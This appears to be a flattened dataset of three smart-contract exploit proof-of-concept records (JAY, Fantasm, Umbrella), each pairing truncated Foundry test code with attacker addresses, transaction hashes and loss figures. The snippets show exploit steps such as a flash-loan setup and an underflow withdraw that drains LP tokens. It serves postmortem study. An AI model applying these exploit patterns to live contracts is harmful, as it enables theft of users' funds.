// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~15.32 ETH // Attacker : 0x0348D20b74Ddc0ac9bfC3626e06d30bb6Fac213b // Attack Contract : https://etherscan.io/address/0xed42cb11b9d03c807ed1ba9c2ed1d3ba5bf37340 // Vulne...
exploit_poc
JAY
2022-12
JAY_exp.sol
flash_loan
482af8031d437d0d
2026-01-07T10:59:16.538531
postmortems
ethereum
16,288,199
~15.32 ETH
15.32
null
https://etherscan.io/address/0xed42cb11b9d03c807ed1ba9c2ed1d3ba5bf37340
https://etherscan.io/address/0xf2919d1d80aff2940274014bef534f7791906ff2
https://etherscan.io/tx/0xd4fafa1261f6e4f9c8543228a67caf9d02811e4ad3058a2714323964a8db61f6
null
null
true
true
true
low
~15.32 ETH
flash-loan
function testExploit() public { // "Clean" contract's balance payable(address(0)).transfer(address(this).balance); emit log_named_decimal_uint("[Start] Attacker ETH balance before exploit", address(this).balance, 18); // Setup flashloan parameters address[] memory tokens = new a...
true
~15.32 ETH
https://etherscan.io/address/0xed42cb11b9d03c807ed1ba9c2ed1d3ba5bf37340
https://etherscan.io/address/0xf2919d1d80aff2940274014bef534f7791906ff2
https://etherscan.io/tx/0xd4fafa1261f6e4f9c8543228a67caf9d02811e4ad3058a2714323964a8db61f6
$15
9.58
high
JAY Exploit (2022-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); IERC20 fsm = IERC20(0xaa621D2002b5a6275EF62d7a065A865167914801); IERC20 xFTM =...
exploit_poc
Fantasm
2022-03
Fantasm_exp.sol
null
071b4444fd81d7b9
2026-01-07T10:59:16.538585
postmortems
unknown
32,971,742
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { cheat.prank(0x9362e8cF30635de48Bdf8DA52139EEd8f1e5d400); fsm.transfer(address(this), 100_000_000_000_000_000_000); emit log_named_uint("Before exploit, xFTM balance of attacker:", xFTM.balanceOf(address(this))); fsm.approve(address(pool), type(uint256).ma...
true
Unknown
2.68
low
Fantasm Exploit (2022-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 700k // Attacker : 0x1751e3e1aaf1a3e7b973c889b7531f43fc59f7d0 // AttackContract : 0x89767960b76b009416bc7ff4a4b79051eed0a9ee // StakingRewards contract: 0xB3FB1D01B07A70...
exploit_poc
Umbrella
2022-03
Umbrella_exp.sol
null
3309738817deb550
2026-01-07T10:59:16.538623
postmortems
ethereum
14,421,983
700k
700,000
null
null
null
https://etherscan.io/tx/0x33479bcfbc792aa0f8103ab0d7a3784788b5b0e1467c81ffbed1b7682660b4fa
null
null
true
false
false
high
700k
unknown
function testExploit() public { emit log_named_decimal_uint("Before exploiting, Attacker UniLP Balance", uniLP.balanceOf(address(this)), 18); StakingRewards.withdraw(8_792_873_290_680_252_648_282); //without putting any crypto, we can drain out the LP tokens in uniswap pool by underflow. /* ...
true
700k
$700.0K
6
medium
Umbrella Exploit (2022-03)
true
false
true
false